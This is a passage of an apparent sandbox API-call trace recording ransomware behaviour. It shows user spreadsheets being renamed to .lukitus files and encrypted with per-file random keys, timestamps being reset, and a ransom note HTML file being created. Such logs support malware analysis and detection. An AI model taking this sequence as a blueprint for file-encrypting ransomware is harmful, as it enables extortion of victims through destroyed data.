lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa2, lpOverlapped=0x0) returned 1 [0106.484] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x637f1b10, dwHighDateTime=0x1d31760)) [0106.484] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.484] FlushFileBuffers (hFile=0x328) returned 1 [0106.487] SetFileAttributesW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-49CF61EE-57465675BB4A.lukitus", dwFileAttributes=0x80) returned 1 [0106.488] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.488] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.488] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.488] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.488] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\lukitus-b59f.htm" (normalized: "c:\\users\\aetadzjz\\desktop\\lukitus-b59f.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.488] DeviceIoControl (in: hDevice=0x328, dwIoControlCode=0x9c040, lpInBuffer=0x281fca4*, nInBufferSize=0x2, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x281fc98, lpOverlapped=0x0 | out: lpInBuffer=0x281fca4*, lpOutBuffer=0x0*, lpBytesReturned=0x281fc98*=0x0, lpOverlapped=0x0) returned 1 [0106.488] WriteFile (in: hFile=0x328, lpBuffer=0x28a0048*, nNumberOfBytesToWrite=0x22aa, lpNumberOfBytesWritten=0x281fc8c, lpOverlapped=0x0 | out: lpBuffer=0x28a0048*, lpNumberOfBytesWritten=0x281fc8c*=0x22aa, lpOverlapped=0x0) returned 1 [0106.489] CloseHandle (hObject=0x328) returned 1 [0106.490] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\0xY2zyvX Zz5I6TOq4m.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0xy2zyvx zz5i6toq4m.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02484f0, ftCreationTime.dwHighDateTime=0x1d2ffe6, ftLastAccessTime.dwLowDateTime=0xb35f1590, ftLastAccessTime.dwHighDateTime=0x1d2ff2d, ftLastWriteTime.dwLowDateTime=0xb35f1590, ftLastWriteTime.dwHighDateTime=0x1d2ff2d, nFileSizeHigh=0x0, nFileSizeLow=0xe684)) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.490] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\0xY2zyvX Zz5I6TOq4m.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0xy2zyvx zz5i6toq4m.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.490] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\0xY2zyvX Zz5I6TOq4m.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0xy2zyvx zz5i6toq4m.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-1E43A153-B4FA5BD13C64.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-1e43a153-b4fa5bd13c64.lukitus"), dwFlags=0x9) returned 1 [0106.492] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.492] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.498] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe684, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe684, lpOverlapped=0x0) returned 1 [0106.499] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.499] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe684, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe684, lpOverlapped=0x0) returned 1 [0106.499] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.500] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63817c70, dwHighDateTime=0x1d31760)) [0106.500] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.500] FlushFileBuffers (hFile=0x328) returned 1 [0106.503] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\0YmBkUpDTKvL.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0ymbkupdtkvl.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd73330, ftCreationTime.dwHighDateTime=0x1d31475, ftLastAccessTime.dwLowDateTime=0xbdee5cd0, ftLastAccessTime.dwHighDateTime=0x1d2fed5, ftLastWriteTime.dwLowDateTime=0xbdee5cd0, ftLastWriteTime.dwHighDateTime=0x1d2fed5, nFileSizeHigh=0x0, nFileSizeLow=0x159e4)) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.503] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\0YmBkUpDTKvL.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0ymbkupdtkvl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.503] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\0YmBkUpDTKvL.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\0ymbkupdtkvl.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-746C6C5A-DDDAFA9FE1BD.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-746c6c5a-dddafa9fe1bd.lukitus"), dwFlags=0x9) returned 1 [0106.505] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.505] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.511] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x159e4, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x159e4, lpOverlapped=0x0) returned 1 [0106.512] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.512] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x159e4, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x159e4, lpOverlapped=0x0) returned 1 [0106.512] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63817c70, dwHighDateTime=0x1d31760)) [0106.513] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.513] FlushFileBuffers (hFile=0x328) returned 1 [0106.517] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_n9i7UNGQlTHEkQ9n65.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_n9i7ungqlthekq9n65.ots"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dc01110, ftCreationTime.dwHighDateTime=0x1d2f71f, ftLastAccessTime.dwLowDateTime=0xb8e294e0, ftLastAccessTime.dwHighDateTime=0x1d30600, ftLastWriteTime.dwLowDateTime=0xb8e294e0, ftLastWriteTime.dwHighDateTime=0x1d30600, nFileSizeHigh=0x0, nFileSizeLow=0x12eed)) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.518] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_n9i7UNGQlTHEkQ9n65.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_n9i7ungqlthekq9n65.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.518] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_n9i7UNGQlTHEkQ9n65.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_n9i7ungqlthekq9n65.ots"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-D050F35D-DF08FE665915.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-d050f35d-df08fe665915.lukitus"), dwFlags=0x9) returned 1 [0106.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.519] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.525] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x12eed, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x12eed, lpOverlapped=0x0) returned 1 [0106.526] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.526] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x12eed, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x12eed, lpOverlapped=0x0) returned 1 [0106.526] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6383ddd0, dwHighDateTime=0x1d31760)) [0106.526] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.528] FlushFileBuffers (hFile=0x328) returned 1 [0106.531] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\6 EzXVOVC4Mq.ods" (normalized: "c:\\users\\aetadzjz\\documents\\6 ezxvovc4mq.ods"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c4b710, ftCreationTime.dwHighDateTime=0x1d3036d, ftLastAccessTime.dwLowDateTime=0xc19e2350, ftLastAccessTime.dwHighDateTime=0x1d2fa80, ftLastWriteTime.dwLowDateTime=0xc19e2350, ftLastWriteTime.dwHighDateTime=0x1d2fa80, nFileSizeHigh=0x0, nFileSizeLow=0x1a6f)) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.531] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.532] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\6 EzXVOVC4Mq.ods" (normalized: "c:\\users\\aetadzjz\\documents\\6 ezxvovc4mq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.532] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\6 EzXVOVC4Mq.ods" (normalized: "c:\\users\\aetadzjz\\documents\\6 ezxvovc4mq.ods"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-6562EF8E-9356A0B9D778.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-6562ef8e-9356a0b9d778.lukitus"), dwFlags=0x9) returned 1 [0106.535] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.535] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.541] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1a6f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1a6f, lpOverlapped=0x0) returned 1 [0106.541] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.541] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1a6f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1a6f, lpOverlapped=0x0) returned 1 [0106.541] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.541] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63863f30, dwHighDateTime=0x1d31760)) [0106.541] SetFileTime (hFile=0x328, 